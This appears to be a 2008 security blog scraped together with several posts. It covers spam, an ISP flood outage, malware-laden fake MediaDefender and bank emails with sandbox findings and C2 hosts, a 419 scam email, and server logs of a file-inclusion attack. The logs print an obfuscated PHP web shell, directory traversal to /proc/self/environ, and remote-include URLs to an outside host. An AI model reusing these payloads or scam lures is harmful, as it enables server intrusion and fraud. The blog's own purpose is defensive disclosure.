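    echo fetch($_GET['url'] ?? '', $_GET['ref'] ?? '', $_SERVER['HTTP_USER_AGENT'] ?? 'vURL');
}
```

Redirects are deliberately not followed: the Location header comes back in the relayed headers, and the client submits it as a fresh request so every hop is vetted. Serving the result as text/plain with nosniff is what keeps a fetched exploit page like the one at the top of this post from running in the browser of whoever is looking at it through the mirror.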

Mininova made a woopsie - and we're paying for it!

Alas, Mininova made a woopsie with their Content Distribution System (CDS) mailing a few days ago, that resulted in their putting their members e-mail addresses in the To box, instead of the BCC box. You can guess the result.

Yeppers, since then, I've received a ton of spam from some of their members that decided to make the most of Mininova's mistake. Spam for example, from "Porno Soundtracks", who thought the spam was so ridiculous, that they decided to join in themselves!;

Oh my god ... this is getting ridiculous :) Well, seize the moment is what other do, so hereby the reason why we signed up in the first place - maybe others want to discuss their marketing efforts as well in a more constructive way?


And from UK-based ibox-security.net, a company that any customer should think twice about using (they obviously couldn't give a crap as long as they get the chance to make some cash);

Hi Guys,

I run iBox-Security a website development, hosting, SEO and IT services company in the UK. We are also in the process of building some software to run alongside the bit torrent application uTorrent which will help increase speed and keep traffic secure.

We offer great web services such as email, hosting and SEO be sure to check out site out at http://ibox-security.net and sign up to our newsletter at http://ibox-security.net/newsletter

iBox-Security | www.ibox-security.net


And what pray tell, did the Mininova staff do to warn their members about spamming? They sent the following of course;

Hi everyone,

Due to a human error, we sent a minor part of our CD users an email with the addresses in the 'To' field instead of 'Bcc'. Our honest apologies for this mistake.

Having said that, the idea is not to build a community-feeling by replying to everyone. So from now on, anybody that uses "reply all" will see his CD account revoked.

Sorry for the inconvenience!

The Mininova staff


Which would be great - if it worked ....... alas it didn't; I've been receiving spam from their members since that e-mail, and evidently I wasn't the only one. What did the Mininova staff do to enforce their first warning? Not much;

People,

Please stop mailing with "reply to all". Use the forum thread
mentioned below to post your experience.

Thanks for your cooperation.

The Mininova staff


Ooooh - that'll tell 'em!

Everyone makes mistakes, we all know that, but letting their members get away with spamming, because of their mistake, IS something they can and should, be held accountable for.

Wednesday, 10 September 2008

So THATS why the network is slow ....

... and here's me thinking something other than the current attacks and high traffic were to blame - alas nope, they aren't the only things wrong, as mentioned by the following e-mail thats just come in from my ISP;

Service: ADSL Dial
Posted: Wed, Sep 10 2008 at 14:35:48
Subject: Problems affecting Broadband connections in Northumberland

BT have told us that they have declared a state of MBORC (Matter Beyond Our Reasonable Control) in Northumberland, after a month's rainfall fell in the space of a day on September 9th.

The exchanges affected are:

- Newcastle
- Benton
- Kenton
- North Shields
- Wallsend
- Prudhoe
- Gosforth
- Blythe
- Whitley Bay

BT have stated: " We have already increased the number of engineers working in the Northumberland area and provided we do not experience further severe weather, recovery to normal fault levels is expected by the start of next week. We will continually review the position with regard to assurance and our aim is to rescind this declaration of MBORC as soon as possible.

In addition to the declaration for the Northumberland area, individual instances of MBORC arising from flood damage or inability to access our network may be declared, for example where a network cabinet has been flooded."

This may mean that if you have a fault in one of these areas, that the BT response time will be slower than normal due to the increase in faults that they are experiencing.

We'll let you know once we've had any further update from BT regarding this situation.

Kind Regards,

James Bailey
Customer Support

--
This email has been sent to you because you have requested to join the PlusNet Status Mailing List. To unsubscribe from this mailing list, please visit http://usertools.plus.net

MediaDefender have been err what now?

Alas it seems the malvelopers want us to think the "other bad guys" are watching us. I read about these e-mails yesterday, but hadn't actually received one myself - now I feel special :o)

As mentioned previously, the e-mail reads;


Dear User!

Your recent internet activity was logged on the following sites:

*    Btjunkie <http://btjunkie.org>
*    SumoTorrent <http://sumotorrent.com/>
*    isoHunt <http://isohunt.com>
*    Btscene <http://www.btscene.com/>
*    Mininova <http://www.mininova.org>
*    Fenopy <http://fenopy.com/>
*    Monova <http://monova.org>
*    Yotoshi <http://yotoshi.com/>
*    GetInvites <http://getinvites.org/>
*    Btmon <http://www.btmon.com/>

We have attached a report about the copyrighted movies, music, softwares you downloaded or searched on these webpages. We strongly advise you to stop any future activities regarding the downloading of illegal content or you can expect prosecution by 17 U.S.C. §§ 512, 1201§1205, 1301§1332; 28 U.S.C. § 4001 laws.

Sincerely,

MediaDefender Inc.


They've also kindly included an attachment (user-B41642-activities.zip) that they claim is a report concerning copyright stuff I've downloaded or searched for on the websites they've referenced (which would be a neat trick considering I've never been on those sites).

This attachment, just like this one, is detected as WORM/Agent.FT

Needless to say, if you receive an e-mail claiming to come from MediaDefender, delete it (MD should be ignored anyway in my opinion (and indeed, in a lot of others' opinions too))

As usual, the following is the e-mail itself in all it's glory.


Exported by: Outlook Export v0.1.2


From: monitoring@mediadefender.com
E-mail:monitoring@mediadefender.com [ 207.171.9.16 - netblk-207-171-9-16.fiberconnexion.com ]
Date: 10/09/2008 13:45:55
Subject: Your illegal internet activities are being logged
**************************************************************************
Links
**************************************************************************

Link: http://mediadefender.com/images/md_logo.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/spacer.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_about_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_sep.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_p2ppir_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_p2pmkt_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/btn_sep.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_news_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://mediadefender.com/images/btn_contact_off.gif
    Domain: mediadefender.com
    IP: 207.171.9.16 [ netblk-207-171-9-16.fiberconnexion.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://btjunkie.org
    Domain: btjunkie.org
    IP: 93.158.65.211 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://sumotorrent.com/
    Domain: sumotorrent.com
    IP: 87.233.179.137 [ - ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://isohunt.com
    Domain: isohunt.com
    IP: 208.71.112.30 [ bthub.com ]
    hpHosts Status: Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://www.btscene.com/
    Domain: www.btscene.com
    IP: 213.239.187.52 [ btscene.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://www.mininova.org
    Domain: www.mininova.org
    IP: 87.233.147.140 [ www.mininova.org ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://fenopy.com/
    Domain: fenopy.com
    IP: 208.71.113.234 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://monova.org
    Domain: monova.org
    IP: 66.29.46.106 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://yotoshi.com/
    Domain: yotoshi.com
    IP: 222.228.121.5 [ s5.IchibaFL100.vectant.ne.jp ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://getinvites.org/
    Domain: getinvites.org
    IP: 83.149.109.52 [ nephesus.nshosters.com ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false

Link: http://www.btmon.com/
    Domain: www.btmon.com
    IP: 66.29.81.140 [ Resolution failed ]
    hpHosts Status: Not Listed
    MDL Status: Not Listed
    PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
<http://mediadefender.com/images/md_logo.gif>     
<http://mediadefender.com/images/spacer.gif>     
About Us<http://mediadefender.com/images/btn_about_off.gif>      <http://mediadefender.com/images/btn_sep.gif>      <http://mediadefender.com/images/btn_p2ppir_off.gif>      <http://mediadefender.com/images/btn_sep.gif>      <http://mediadefender.com/images/btn_p2pmkt_off.gif>      <http://mediadefender.com/btn_sep.gif>      News<http://mediadefender.com/images/btn_news_off.gif>      <http://mediadefender.com/images/btn_sep.gif>      Contact Us<http://mediadefender.com/images/btn_contact_off.gif>     
<http://mediadefender.com/images/spacer.gif>     
<http://mediadefender.com/images/spacer.gif>     

Dear User!


Your recent internet activity was logged on the following sites:

*    Btjunkie <http://btjunkie.org>
*    SumoTorrent <http://sumotorrent.com/>
*    isoHunt <http://isohunt.com>
*    Btscene <http://www.btscene.com/>
*    Mininova <http://www.mininova.org>
*    Fenopy <http://fenopy.com/>
*    Monova <http://monova.org>
*    Yotoshi <http://yotoshi.com/>
*    GetInvites <http://getinvites.org/>
*    Btmon <http://www.btmon.com/>

We have attached a report about the copyrighted movies, music, softwares you downloaded or searched on these webpages. We strongly advise you to stop any future activities regarding the downloading of illegal content or you can expect prosecution by 17 U.S.C. §§ 512, 1201§1205, 1301§1332; 28 U.S.C. § 4001 laws.

Sincerely,

MediaDefender Inc.





**************************************************************************
Headers
**************************************************************************
Return-Path: <monitoring@mediadefender.com>
Delivered-To: services@[RD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
    by smtp-in-77.livemail.co.uk (Postfix) with SMTP id 8445AEFC4ED
    for <services@[RD]>; Wed, 10 Sep 2008 13:54:00 +0100 (BST)
Received: from mediadefender.com (mail.squires.co.za [196.37.170.133])
    by smtp-in-77.livemail.co.uk (Postfix) with ESMTP id 48D4CEFC4ED
    for <services@[RD]>; Wed, 10 Sep 2008 13:51:43 +0100 (BST)
From: monitoring@mediadefender.com
To: services@[RD]
Subject: Your illegal internet activities are being logged
Date: Wed, 10 Sep 2008 14:45:55 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0008_DE9EEA5E.EDC8D727"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080910125143.48D4CEFC4ED@smtp-in-77.livemail.co.uk>
X-Original-To: services@[RD]


/edit 23-09-08

It seems these are still doing the rounds, as I've just received another one. Whilst the e-mail and the zip's filename are identical to the last, the infection in this one is HIDDENEXT/Worm.Gen, with a new size of 324K.

http://www.virustotal.com/analisis/39fdcd263877cae49faaa6e4a2576401

Well well well, this is an interesting little sample, isn't it ..... Running the file through ThreatExpert shows multiple outgoing connections (IRC, SMTP). Two GET requests were made to download additional components;

http://www.isc.org/ISC-gears2.png
http://www.isc.org/automation/n09230945.asp

Other connections include;

sco.rs-forum.biz Port: 5900
mxs.isp.com Port: 5900
206.137.17.89 Port: 5900

rs-forum.biz claims to be a parked page (yeah right!)

http://vurl.mysteryfcm.co.uk/?url=http://rs-forum.biz/&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=1&ref=

The IRC connection shows it's joining the #biohazard2 channel, and generating the following traffic;

NICK BX|162490404
USER dfewojeuaf 0 0 :BX|162490404
USERHOST BX|162490404
MODE BX|162490404 -ix
JOIN #biohazard2 youareadumbfuck
NICK BX|815533618
USER lnonqyumtlt 0 0 :BX|815533618
USERHOST BX|815533618
MODE BX|815533618 -ix
NICK BX|165626277
USER nddpsdtcfmz 0 0 :BX|165626277
USERHOST BX|165626277
MODE BX|165626277 -ix
NICK BX|238465948
USER ntzxwcaoprz 0 0 :BX|238465948
USERHOST BX|238465948
MODE BX|238465948 -ix
NICK BX|344699429
USER qcbbouebg 0 0 :BX|344699429
USERHOST BX|344699429
MODE BX|344699429 -ix


The full TE report can be found at;

http://www.threatexpert.com/report.aspx?md5=713885a1432fc4a822f9473828045952

My bank made a woopsie? Nope actually, they didn't .....

That's right folks, the scammers are back - and this time they're carrying an infection (guess the phishing stuff wasn't working as well for them?). I've received 27 of these so far, and other than the sender, they're all virtually identical;


Greetings!

Yesterday I received a message from your bank with your account statement. I don’t need problems with the police because of your bank’s error!!! Please contact your bank and ask them to not mistakenly send me your personal data to me.

For the proof of my non-participation in obtaining your personal data, I am attaching the copy of the message containing your account statement which I had received via e-mail!!!!

You must print the copy of the message and pass it on to the bank, so that they wouldn’t mistakenly send me your personal bank account data.



The attachment? BANK_DETAILS.zip, which contains a 66.5KB file called .... wait for it .... BANK_DETAILS.exe, with an Excel icon to make you think it's an XLS file (naughty scammer!). Detection, alas, isn't that good, with only 16/32 engines detecting it.

http://www.virustotal.com/analisis/ea81b8ad78cb532af14368694ef53b54

Alas, the Sunbelt sandbox claims the file has already been analyzed, but err;

http://research.sunbelt-software.com/ViewMalware.aspx?id=5561279

Where is it? Instead, I've submitted it both to Anubis and to the Microsoft sandbox - results will be posted when I receive them. In the meantime, the e-mail itself is below.


Exported by: Outlook Export v0.1.2


From: Ali Rosen
E-mail:lvhvljivf@bobgail.com [ 63.206.146.140 - bobgail.com ]
Date: 10/09/2008 07:14:29
Subject: I received a message from your bank
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Greetings!

Yesterday I received a message from your bank with your account statement.
I don’t need problems with the police because of your bank’s error!!!
Please contact your bank and ask them to not mistakenly send me your personal data to me.
For the proof of my non-participation in obtaining your personal data, I am attaching the copy of the message containing your account statement which I had received via e-mail!!!!
You must print the copy of the message and pass it on to the bank, so that they wouldn’t mistakenly send me your personal bank account data.



**************************************************************************
Headers
**************************************************************************
Return-Path: <lvhvljivf@bobgail.com>
Delivered-To: services@[RMVD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
    by smtp-in-125.livemail.co.uk (Postfix) with SMTP id 51454534187
    for <services@[RMVD]>; Wed, 10 Sep 2008 07:14:33 +0100 (BST)
Received: from 84.red-80-34-50.staticip.rima-tde.net (84.Red-80-34-50.staticIP.rima-tde.net [80.34.50.84])
    by smtp-in-125.livemail.co.uk (Postfix) with ESMTP id 7643253420C
    for <nobody@[RMVD]>; Wed, 10 Sep 2008 07:14:27 +0100 (BST)
Received: from [80.34.50.84] by smtp-relay.pbi.net; Wed, 10 Sep 2008 07:14:29 +0100
Date: Wed, 10 Sep 2008 07:14:29 +0100
From: "Ali Rosen" <lvhvljivf@bobgail.com>
X-Mailer: The Bat! (v2.12.00) Business
Reply-To: lvhvljivf@bobgail.com
X-Priority: 3 (Normal)
Message-ID: <220419770.17700592054610@bobgail.com>
To: nobody@[RMVD]
Subject: I received a message from your bank
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----------1A213674BF6E82"
X-Original-To: nobody@[RMVD]


/edit

As mentioned, the following are the Anubis and MS sandbox results;

http://anubis.iseclab.org/result.php?taskid=fdd6caea727f37847548aeba86a4f473

http://www.microsoft.com/security/portal/Entry.aspx?name=PWS%3aWin32%2fZbot.UV

No really, that IS all Microsoft decided to send for this one!

419'ers want to stop fraud, scam and money laundering

No really, they do - they said so, look! (extra points if you notice the sarcasm)

These scams really are nothing new; they've been going on for years, and though there are hundreds of variations, the plot is always the same - sucker someone into handing over their details and money (but please Mr 419'er, STOP USING ALL CAPS - IT'S ANNOYING!).


Exported by: Outlook Export v0.1.2


From: smtp.orange.nl
E-mail:courierexpress@orange.nl [ 62.37.237.15 - Resolution failed ]
Date: 10/09/2008 12:49:47
Subject: ATTN: RE: CONFIRMATION OF THE TRANSFER PAYMENT.
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
ATTN: RE: CONFIRMATION OF THE TRANSFER PAYMENT.

THIS LETTER IS TO BRING TO YOUR NOTICE THAT YOU’RE FUND HAS BEEN TRANSFER TO A BANK IN LONDON THROUGH ELECTRONIC BANKING TRANSFER SYSTEM OF PAYMENT, THEREFORE I WILL SEND YOU THE BANK TELEX CONTACT IMMEDIATELY.
THIS SYSTEM OF PAYMENT WILL CREDIT YOUR FUND DIRECT TO YOUR BANK ACCOUNT IN SWIFT CODE MY ADVISED TO YOU IS IF YOU KNOW ANY PERSON FAMILY OR FRIEND THAT HAS LOST MONEY TOFRAUDSTERS PLEASE TELL HIM/HER TO WRITE TO THIS COMMISSION WITH PROVES AND WE WILL HANDLE HIS/HER CASE THEN PAY BACK AFTER VERIFICATION.
NOTE” YOUR URGENT ACTION IS HIGHLY NEEDED AS TO RECEIVE THE ORIGINAL COPY OF THE TRANSFER SLIP TO ENABLE YOU CONFIRM YOUR FUND IN YOUR BANK ACCOUNT, THIS SYSTEM OF PAYMENT IS TO CONTROL FRAUD, SCAM AND MONEY LAUNDERING. 
  
ALL THE AFRICAN CRIME FIGHTERS LEADERS HAS COME TOGETHER TO INFORM THE WORLD WHAT IS GOING ON NOW AND WE HAVE RECOVER OVER $322 MILLION DOLLARS(THREE HUNDRED AND TWENTY TWO MILLION DOLLARS) FROM THE PEOPLE WE HAVE BEHIND BARS. THE ONLY REASON WE ARE WRITING YOU THIS LETTER, IS BECAUSE YOUR NAME WAS GIVEN TO US BY ONE OF THE FRAUDSTERS IN OUR JAIL HOUSE, THAT HE COLLECTED MONEY FROM BY TRICKS.

NOTE THAT YOU ARE TO FOLLOW THE INSTRUCTIONS AS IT HAS BEEN GIVEN TO YOU TO AVOID ANY MISTAKE. ALSO NOTE THAT YOU ARE ADVICE TO PROVIDE US YOUR CONTACT TELEPHONE NUMBER SO THAT WE CAN TALK MORE ON PHONE REGARDING THE PRESENT SITUATION KEEP IN TOUCH.
MR.WILLIAMS JOHNSON
0044-7031828628



**************************************************************************
Headers
**************************************************************************
Return-Path: <courierexpress@orange.nl>
Delivered-To: services@[RMV]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
    by smtp-in-116.livemail.co.uk (Postfix) with SMTP id DBDF05FE8D6
    for <services@[RMV]>; Wed, 10 Sep 2008 12:51:38 +0100 (BST)
Received: from smtp-out.orange.net (smtp-out.orange.net [193.252.22.118])
    by smtp-in-116.livemail.co.uk (Postfix) with ESMTP id D2E115FE8D6
    for <technicalsupport@[RMV]>; Wed, 10 Sep 2008 12:51:38 +0100 (BST)
Received: from me-wanadoo.net (localhost [127.0.0.1])
    by mwinf7009.orange.net (SMTP Server) with ESMTP id 812251C0008B;
    Wed, 10 Sep 2008 13:51:38 +0200 (CEST)
Received: from User (dhcp2068.myzipnet.com [41.202.20.68])
    by mwinf7009.orange.net (SMTP Server) with ESMTP id 71DE01C0009D;
    Wed, 10 Sep 2008 13:51:08 +0200 (CEST)
X-ME-UUID: 20080910115108466.71DE01C0009D@mwinf7009.orange.net
Reply-To: <williamsk3johnson@gmail.com>
From: "smtp.orange.nl" <courierexpress@orange.nl>
Subject: ATTN: RE: CONFIRMATION OF THE TRANSFER PAYMENT.
Date: Wed, 10 Sep 2008 12:49:47 +0100
MIME-Version: 1.0
Content-Type: text/plain;
    charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20080910115108.71DE01C0009D@mwinf7009.orange.net>
To: undisclosed-recipients: ;
X-Original-To: technicalsupport@[RMV]


In this case, the phone number they've given is a UK mobile on the Magrathea Telecom network;

0044-7031828628

Thankfully, Magrathea are fantastic at responding and shutting these down for me (other telcos need to take heed!!!). If you receive one of these and it begins with a +44 (0044) number, stick it into the following to find out which company provides the number, then forward them the e-mail (tell 'em I told you to!);

http://www.ukphoneinfo.com/section/tci/locator.shtml

Hint: I've provided a few you can use over at: http://forum.hosts-file.net/viewtopic.php?f=54&t=340

/edit

Damn, they're getting quicker! 10 mins or so after reporting the above to Magrathea, I got a reply (it used to take up to a few hours). Thank you Laura!!!

Dear Steven

Thank you for bringing this matter to our attention. If this number is in breach of our terms and conditions then it will be suspended.

Best regards
Laura

Laura Newberry
Magrathea Telecom


/edit 2

Laura wrote to clarify that the 070 numbers aren't actually mobile numbers, but personal numbers;


Cool - my name in lights! ;o)

Just so you're aware though, numbers beginning with 070 aren't actually mobile numbers, they are what are called Personal Numbers. (Sometimes called virtual numbers or "follow me" numbers.) This kind of number can be forwarded to any existing landline or mobile number in the UK or abroad. So while they could be being forwarded to a mobile, the number itself isn't actually a mobile number. That will be true of other 070 numbers supplied by other telcos, not just the ones provided by us.

Hope this helps!
Laura


and;

Hi Steven

Yes that is fine! If you google "Personal Number" it comes up with this link on the Ofcom website, which may give you some helpful info about Personal Numbering as well:

http://www.ofcom.org.uk/telecoms/ioi/numbers/num_070_guide

Kind regards
Laura


Cheers Laura :)

Alas, another exploit attempt (RFI+PHP)

Alas, it seems 88.84.157.127 (v32747.1blu.de) badly wanted to exploit my server. From the wonderful world of logs, we have (note that the scroll bars won't display in IE for some reason);


2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:54 GET /misc/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
